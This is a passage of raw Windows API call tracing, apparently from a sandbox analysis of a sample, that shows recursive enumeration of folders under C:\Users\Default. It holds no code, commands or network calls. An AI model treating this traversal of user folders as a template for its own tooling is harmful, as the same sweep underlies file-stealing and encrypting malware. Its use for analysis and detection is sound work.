nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.539] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.539] lstrlenW (lpString="desktop.ini") returned 11 [0184.540] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.540] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.540] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0184.540] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.540] lstrlenW (lpString="Favorites") returned 9 [0184.540] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.622] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.622] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.622] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.622] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.622] lstrlenW (lpString="desktop.ini") returned 11 [0184.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.623] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfeffd5f0, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.623] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.623] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfefb1330, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.623] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.623] lstrlenW (lpString="desktop.ini") returned 11 [0184.623] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.623] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.623] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0184.623] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.623] lstrlenW (lpString="Microsoft Websites") returned 18 [0184.624] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.665] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.698] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.698] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa066c0, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0184.698] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.698] lstrlenW (lpString="IE Add-on site.url") returned 18 [0184.698] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.699] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.699] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0184.699] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.699] lstrlenW (lpString="MSN Websites") returned 12 [0184.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.705] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.705] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.705] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa2c821, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0184.728] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.728] lstrlenW (lpString="MSN Autos.url") returned 13 [0184.729] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.745] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.745] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0184.745] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.745] lstrlenW (lpString="Windows Live") returned 12 [0184.745] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\*", lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6ebd60 [0184.773] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.773] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.773] FindNextFileW (in: hFindFile=0x6ebd60, lpFindFileData=0x704750 | out: lpFindFileData=0x704750*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0184.773] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.773] lstrlenW (lpString="Get Windows Live.url") returned 20 [0184.773] FindClose (in: hFindFile=0x6ebd60 | out: hFindFile=0x6ebd60) returned 1 [0184.774] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x704750 | out: hHeap=0x6b0000) returned 1 [0184.774] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0184.774] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.774] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.774] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0184.774] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.774] lstrlenW (lpString="Links") returned 5 [0184.774] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Links\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.792] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.792] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.792] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.792] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.792] lstrlenW (lpString="desktop.ini") returned 11 [0184.792] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.793] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.793] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0184.793] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.793] lstrlenW (lpString="Local Settings") returned 14 [0184.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x6ec488, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0184.794] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.794] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0184.794] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.794] lstrlenW (lpString="Music") returned 5 [0184.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.794] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="..", cAlternateFileName="")) returned 1 [0184.794] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.794] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.794] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.794] lstrlenW (lpString="desktop.ini") returned 11 [0184.794] FindClose (in: hFindFile=0x6ebd20 | out: hFindFile=0x6ebd20) returned 1 [0184.795] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.795] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0184.795] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.795] lstrlenW (lpString="My Documents") returned 12 [0184.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x6ec488, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0184.795] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.795] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0184.795] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.795] lstrlenW (lpString="NetHood") returned 7 [0184.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x6eb780, ftCreationTime.dwLowDateTime=0x6ec488, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0184.795] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7ae0 | out: hHeap=0x6b0000) returned 1 [0184.795] FindNextFileW (in: hFindFile=0x6ebce0, lpFindFileData=0x6ee5c8 | out: lpFindFileData=0x6ee5c8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0184.795] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0x0) returned 0x102 [0184.795] lstrlenW (lpString="NTUSER.DAT") returned 10 [0184.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2d1bb180, cFileName=".", cAlternateFileName="")) returned 0x6ebd20 [0184.796] FindNextFileW (in: hFindFile=0x6ebd20, lpFindFileData=0x6e7ae0 | out: lpFindFileData=0x6e7ae0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 